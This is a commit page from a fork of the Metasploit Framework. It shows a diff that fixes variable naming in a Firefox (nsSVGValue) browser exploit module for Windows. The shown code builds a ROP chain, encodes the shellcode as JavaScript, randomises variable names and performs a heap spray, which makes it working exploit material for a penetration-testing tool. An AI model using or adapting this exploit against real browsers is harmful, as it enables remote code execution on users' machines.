dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Fix broken target (variable naming)

This commit is contained in:
sinn3r 2012-05-17 11:37:49 -05:00
parent 2fccf4674f
commit 952ada1742
1 changed files with 8 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
modules/exploits/windows/browser/mozilla_nssvgvalue.rb
View File

@ -184,7 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
# Create the payload
print_status("Creating payload for #{target.name}")
print_status("Creating payload for #{my_target.name}")
table =
[
0x0c0c0c0c, # index
@ -194,15 +194,15 @@ class Metasploit3 < Msf::Exploit::Remote
].pack("V*")
rop = rand_text_alpha_upper(56)
rop << [ target['PopEax'] ].pack("V")
rop << [ my_target['PopEax'] ].pack("V")
rop << rand_text_alpha_upper(40)
rop << get_rop_chain(target['FF'],target['OS'])
rop << get_rop_chain(my_target['FF'],my_target['OS'])
# Encode table, chain and payload
rop_js = Rex::Text.to_unescape(table+rop, Rex::Arch.endian(target.arch))
rop_js = Rex::Text.to_unescape(table+rop, Rex::Arch.endian(my_target.arch))
code = payload.encoded
code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))
code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(my_target.arch))
# random JavaScript variable names
i_name = rand_text_alpha(rand(10) + 5)
@ -240,7 +240,7 @@ class Metasploit3 < Msf::Exploit::Remote
var #{rop_name} = unescape("#{rop_js}");
var #{code_name} = unescape("#{code_js}");
var #{offset_length_name} = #{target['OffSet']};
var #{offset_length_name} = #{my_target['OffSet']};
for (var #{i_name}=0; #{i_name} < 0x300; #{i_name}++)
{
@ -261,9 +261,9 @@ class Metasploit3 < Msf::Exploit::Remote
var #{single_sprayblock_name} = #{junk_offset_name} + #{rop_name} + #{code_name};
#{single_sprayblock_name} += #{padding_name}.substring(0,0x800 - #{offset_length_name} - #{rop_name}.length - #{code_name}.length);
while (#{single_sprayblock_name}.length < #{target['Size']}) #{single_sprayblock_name} += #{single_sprayblock_name};
while (#{single_sprayblock_name}.length < #{my_target['Size']}) #{single_sprayblock_name} += #{single_sprayblock_name};
#{sprayblock_name} = #{single_sprayblock_name}.substring(0, (#{target['Size']}-6)/2);
#{sprayblock_name} = #{single_sprayblock_name}.substring(0, (#{my_target['Size']}-6)/2);
#{varname_name} = "var" + #{randnum1_name}.toString() + #{randnum2_name}.toString();
#{varname_name} += #{randnum3_name}.toString() + #{randnum4_name}.toString() + #{i_name}.toString();